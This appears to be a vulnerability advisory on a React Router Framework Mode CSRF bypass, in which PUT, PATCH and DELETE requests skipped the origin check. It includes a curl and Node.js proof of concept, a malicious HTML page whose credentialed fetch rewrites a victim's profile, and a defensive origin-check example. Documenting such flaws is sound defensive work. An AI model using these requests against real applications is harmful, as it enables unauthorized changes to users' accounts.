The vulnerability arises in React Router's Framework Mode, where the built-in CSRF protection mechanism was applied only to `POST` requests. The origin check, designed to ensure that a request originates from the same domain, ran exclusively for the `POST` verb. Consequently, state-changing requests that used the `PUT`, `PATCH`, or `DELETE` methods were never validated. An attacker could therefore craft a cross-origin `PUT`, `PATCH`, or `DELETE` request to a vulnerable React Router application and have it processed as if it were legitimate. This bypass allows a malicious site to perform actions on behalf of an authenticated user without their consent.
Importantly, the severity is considered low because modern browsers already provide strong defenses against such attacks. A cross-origin `PUT`, `PATCH`, or `DELETE` request triggers a CORS preflight request. The server must respond with the appropriate CORS headers (e.g., `Access-Control-Allow-Origin`) to permit the actual request; otherwise, the browser blocks it. Additionally, the `SameSite` cookie attribute, which is set to `Lax` by default in most modern browsers, prevents the browser from attaching the session cookie to cross-site requests. These existing safeguards effectively block the attack vectors that the missing CSRF check would otherwise be responsible for. The vulnerability only becomes exploitable in highly specific configurations where CORS or cookie policies have been intentionally weakened.
Furthermore, the issue is confined to Framework Mode; applications using Declarative Mode (`<BrowserRouter>`) or Data Mode (`createBrowserRouter`/`<RouterProvider>`) are not impacted. The CSRF check was originally introduced in version 7.12.0 as an additional layer of protection, but its implementation was incomplete. The flaw was corrected in version 7.15.1, which extends the same origin validation to `PUT`, `PATCH`, and `DELETE` requests.
DailyCVE Form:
Platform: React Router Framework
Version: 7.12.0 to 7.15.0
Vulnerability: CSRF via PUT
Severity: Low
Date: 2026-06-02
Prediction: 2026-06-15
What Undercode Says:
Test for the CSRF bypass on a `PUT` request (the cross-origin `Origin` header is what the server should reject):

```shell
curl -X PUT https://victim-app.com/api/resource \
  -H "Origin: https://attacker.com" \
  -H "Cookie: session=abc123" \
  -d "data=malicious"
```
```javascript
// Node.js script to simulate a cross-origin PUT request
const https = require('https'); // the target is served over HTTPS, so use the https module
const body = 'data=malicious';
const options = {
  hostname: 'victim-app.com',
  path: '/api/resource',
  method: 'PUT',
  headers: {
    'Origin': 'https://attacker.com',
    'Content-Type': 'application/x-www-form-urlencoded',
    'Content-Length': Buffer.byteLength(body)
  }
};
// Log the status code so the outcome of the origin check is visible
const req = https.request(options, res => {
  console.log(`status ${res.statusCode}`);
  res.resume();
});
req.on('error', err => console.error(err.message));
req.write(body);
req.end();
```
How to Exploit:
A malicious website can host an HTML page that contains a JavaScript `fetch` call or an `XMLHttpRequest` that targets a vulnerable React Router endpoint using the `PUT`, `PATCH`, or `DELETE` method. Because the server does not validate the origin for these verbs, the request is processed, allowing an attacker to modify or delete data on behalf of the authenticated victim.
```html
<!-- Malicious page hosted at attacker.com -->
<script>
fetch('https://victim-app.com/api/user/profile', {
  method: 'PUT',
  credentials: 'include', // send session cookie
  body: JSON.stringify({ email: '[email protected]' })
});
</script>
```
Protection:
Upgrade `react-router` to version `7.15.1` or higher.
If upgrading is not immediately possible, configure the `allowedActionOrigins` field in `react-router.config.ts` to explicitly permit only trusted origins.
Enforce strict CORS policies on the server and set `SameSite=Lax` or `SameSite=Strict` for session cookies.
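The defect described above and the fix it received come down to which verbs go through the origin check. The following added example (not React Router's own code; all names are assumed) shows a framework-agnostic version of that check in its vulnerable `POST`-only shape beside the corrected shape that covers every state-changing verb, using exact origin matching so look-alike hosts are rejected:

```javascript
// Added example of a CSRF origin check for state-changing requests.
// Not React Router's implementation; function and variable names are assumed.
const UNSAFE_METHODS = new Set(['POST', 'PUT', 'PATCH', 'DELETE']);

// Normalise a URL or origin string to its scheme://host[:port] form, or null.
function normaliseOrigin(value) {
  if (!value) return null;
  try {
    return new URL(value).origin; // exact-match comparison, never a prefix check
  } catch (e) {
    return null; // malformed value or the literal "null" origin (sandboxed iframe, file://)
  }
}

// The vulnerable shape: only POST is validated, so PUT/PATCH/DELETE are never checked.
function checkOriginPostOnly(method, headers, allowedOrigins) {
  if (method.toUpperCase() !== 'POST') return true;
  return allowedOrigins.has(normaliseOrigin(headers.origin));
}

// The corrected shape: every state-changing verb goes through the same check.
function checkOriginAllUnsafe(method, headers, allowedOrigins) {
  if (!UNSAFE_METHODS.has(method.toUpperCase())) return true; // GET/HEAD/OPTIONS are safe verbs
  // Browsers send Origin on cross-site requests and on same-origin non-GET requests;
  // fall back to Referer, and reject when neither header identifies the caller.
  const origin = normaliseOrigin(headers.origin) ?? normaliseOrigin(headers.referer);
  return origin !== null && allowedOrigins.has(origin);
}

// Constructed sample requests (not captured traffic) for the two checks.
const allowed = new Set(['https://victim-app.com']);
const crossSitePut = { method: 'PUT', headers: { origin: 'https://attacker.com' } };
const lookalikePost = { method: 'POST', headers: { origin: 'https://victim-app.com.attacker.com' } };

// Returns the decisions of both checks for a request, for side-by-side comparison.
function compare(req) {
  return {
    postOnly: checkOriginPostOnly(req.method, req.headers, allowed),
    allUnsafe: checkOriginAllUnsafe(req.method, req.headers, allowed),
  };
}

console.log('cross-site PUT:', compare(crossSitePut));   // postOnly: true, allUnsafe: false
console.log('look-alike POST:', compare(lookalikePost)); // both false
```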
Impact:
An attacker can perform state‑changing actions (e.g., updating user profiles, deleting resources, or modifying settings) by tricking an authenticated user into visiting a malicious website. The impact is limited by modern browser protections, but in configurations where CORS or cookie policies are weakened, the vulnerability could lead to data corruption or unauthorized modifications.
Sources:
Reported By: github.com